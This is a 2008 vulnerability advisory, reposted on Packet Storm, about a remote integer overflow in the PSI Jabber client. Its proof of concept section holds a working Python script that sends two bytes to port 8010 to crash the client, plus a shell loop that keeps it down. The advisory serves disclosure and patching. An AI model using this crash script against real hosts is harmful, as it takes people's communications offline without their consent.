what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

PSI Integer Overflow Denial Of Service

PSI Integer Overflow Denial Of Service
Posted Dec 30, 2008
Authored by Jesus Olmos Gonzalez

PSI suffers from a remote integer overflow denial of service vulnerability. Proof of concept code is included.

tags | exploit, remote, denial of service, overflow, proof of concept
SHA-256 | de69b659adeceb5045e248bf603c15268a1229a6571f12bd70969d4db0132621

PSI Integer Overflow Denial Of Service

Change Mirror Download
=============================================
INTERNET SECURITY AUDITORS ALERT 2008-004
- Original release date: 12th December, 2008
- Last revised: 22nd December, 2008
- Discovered by: Jesus Olmos Gonzalez
- Severity: 4/5
=============================================

I. VULNERABILITY
-------------------------
PSI remote integer overflow DoS

II. BACKGROUND
-------------------------
PSI is a widely used jabber client Qt4 based, available for Windows,
Mac, linux, and other operative systems.

III. DESCRIPTION
-------------------------
In order doing file transfers, a open port is needed (by default is
8010/tcp)

If first byte of data stream is a 0x05, it means socks5 option and we
enter in the vulnerable zone of the code.

Is possible to satisfy the jump: cmp al, 5 -> je vulnCheck()

The second byte is the amount of bytes to memcpy, but there is a check:

cmp ecx, 10 -> jg goHome()

Well the signed comparison lets us to send negative values, the
acepted range are <= 10 and > 0x7f (it shoud be compared as unsigned)
then the check can be bypased with this int overflow, now we can play
with 0x80 - 0xff range, and the rest of the stream.

By now we pass successfully the QByteArray.Resize() and
QByteArray.Realloc()

And arrive to the memcpy, from all the data stream sended, n bytes
will be copied, n is controlled by us :)
The problem to make a heap overflow, is that the destiny variable will
be resized to n. Then is possible to hangup the process or also the
system with these two ways

1. Can send a only two bytes buffer \x05\xff then the memcpy's rep
movz will access to non paged source, becouse we don't sent the bytes
we are saying to copy.
2. Can be sended a very large buffer and firce a large copy of memory.
The system can be saturated.

IV. PROOF OF CONCEPT
-------------------------
#!/usr/bin/python
#by sha0 remote integer overflow DoS (Linux && windows)
#http://jolmos.blogspot.com

import socket, sys

sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
try:
sock.connect((sys.argv[1],8010))
except:
print 'Cannot connect!'
sys.exit(1)

try:
sock.send('\x05\xff')
print 'Crashed!'
except:
print 'Cannot send!'

sock.close()
#eof

The process can be crashed remotelly by:
./PSIcoKiller.py <ip>

PSI down forever:
while [ 1 ]; do ./PSIcoKiller.py <ip> ;done

V. BUSINESS IMPACT
-------------------------
Remote/local Denial of Service of the communications.

VI. SYSTEMS AFFECTED
-------------------------
PSI 0.11, 0.12 and 0.13 (last)
PSI 0.10 not affected
PSI 0.12.1 Solves the problem

Tested in Linux and Windows, but may crash other heap implementations.

VII. SOLUTION
-------------------------
PSI 0.12.1 solves the problem, nevertheless i suggest filter this port
whenever possible.
Thanks to kev and infinity for their quick response.

VIII. REFERENCES
-------------------------
http://psi-im.org

IX. CREDITS
-------------------------
This vulnerability has been discovered and reported by
Jesus Olmos Gonzalez (jolmos (at) isecauditors (dot) com).

X. REVISION HISTORY
-------------------------
December 12, 2008: Initial release
December 17, 2008: update the new that 0.12.1 solves the problem.

XI. DISCLOSURE TIMELINE
-------------------------
November 20, 2008: Vulnerability acquired by
Internet Security Auditors
December 02, 2008: Vendor notification
December 12, 2008: Advisory documentation
December 18, 2008: Vendor Release 0.12.1
December 23, 2008: Published

XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
Internet Security Auditors accepts no responsibility for any damage
caused by the use or misuse of this information.
Login or Register to add favorites

File Archive:

December 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    0 Files
  • 2
    Dec 2nd
    41 Files
  • 3
    Dec 3rd
    25 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close